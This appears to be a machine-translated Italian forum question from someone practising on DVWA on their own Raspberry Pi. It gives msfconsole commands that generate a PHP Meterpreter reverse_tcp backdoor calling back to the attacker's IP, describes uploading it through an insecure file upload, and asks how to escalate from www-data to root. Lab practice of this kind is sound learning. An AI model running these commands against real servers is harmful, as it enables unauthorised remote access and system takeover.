Sto scherzando con Kali Linux, MSFConsole e DVWA (dannatamente vulnerabile applicazione Web).
Sono riuscito a entrare nel sistema con successo (Raspberry Pi) creando una backdoor PHP e caricandola tramite SQL injection.
Ora ho accesso al sistema, l'unico problema è che sto funzionando come www-data (non sarebbe bello diventare root per creare il tuo account super-utente ?!) E 'possibile in qualche modo privilegiare l'escalation in Linux (Raspbaian) usando MSFConsole, BASH (dalla backdoor) o in un altro modo?
Ho provato a lanciare "use priv" nel prompt meterpreter ma l'errore che ottengo è "Impossibile caricare l'estensione: nessun modulo del nome ext_server_priv.php trovato". Se è d'aiuto, sto utilizzando l'exploit reverse_tcp come script PHP.
Sono stato in grado di compromettere il sistema eseguendo questo è Msfconsole
use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit
Ho quindi caricato hackme.php sul server web tramite il caricamento di file non sicuro, dopo che l'ho fatto ho quindi navigato nel file caricato.
Il credito va a questo video per avermi dato il codice sopra. (Ho dovuto usare la funzione di generazione invece di msfpayload perché quella funzionalità è stata spostata a causa della sua deprecazione.)